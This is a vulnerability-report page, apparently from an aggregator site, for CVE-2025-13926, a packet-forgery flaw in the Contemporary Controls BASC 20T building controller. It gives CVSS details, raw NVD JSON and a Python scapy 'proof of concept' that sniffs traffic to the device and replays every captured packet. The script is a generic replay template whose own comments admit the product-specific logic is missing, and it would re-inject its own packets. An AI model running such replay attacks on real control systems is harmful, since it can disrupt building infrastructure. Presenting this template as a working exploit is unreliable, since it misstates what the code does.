Security Vulnerability Report
中文
CVE-2025-13926 CVSS 9.8 CRITICAL

CVE-2025-13926

Published: 2026-04-09 20:16:24
Last Modified: 2026-04-13 15:02:28
Source: [email protected]

Description

An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Contemporary Controls BASC 20T (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2025-13926 # This script demonstrates the concept of sniffing and replaying packets. # Requires scapy: pip install scapy from scapy.all import * # Configuration TARGET_IP = "192.168.1.100" # IP of the BASC 20T device INTERFACE = "eth0" def packet_callback(packet): """ Callback to process sniffed packets. In a real scenario, specific protocol identifiers would be checked here. """ if packet.haslayer(IP) and packet[IP].dst == TARGET_IP: print(f"[+] Captured packet from {packet[IP].src} to {packet[IP].dst}") # Logic to extract the payload relevant to BASC 20T would go here # For demonstration, we assume the whole packet is the replay object replay_attack(packet) def replay_attack(original_packet): """ Function to forge and send the replayed packet. """ print("[*] Forging packet to send arbitrary request...") # Modify the packet if necessary to change the command (injection) # For this PoC, we replay the captured packet as is (Replay Attack) # Remove checksums so Scapy recalculates them del original_packet[IP].chksum if original_packet.haslayer(TCP): del original_packet[TCP].chksum # Send the forged packet sendp(original_packet, iface=INTERFACE, verbose=0) print("[+] Packet sent successfully.") if __name__ == "__main__": print(f"[*] Starting sniff on interface {INTERFACE} for target {TARGET_IP}...") # Sniff traffic filter can be adjusted (e.g., tcp and port X) sniff(iface=INTERFACE, prn=packet_callback, store=0)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13926", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:23.807", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "An attacker could use data obtained by sniffing the network traffic to \nforge packets in order to make arbitrary requests to Contemporary \nControls BASC 20T."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json", "source": "[email protected]"}, {"url": "https://www.ccontrols.com/support/contacttech.htm", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.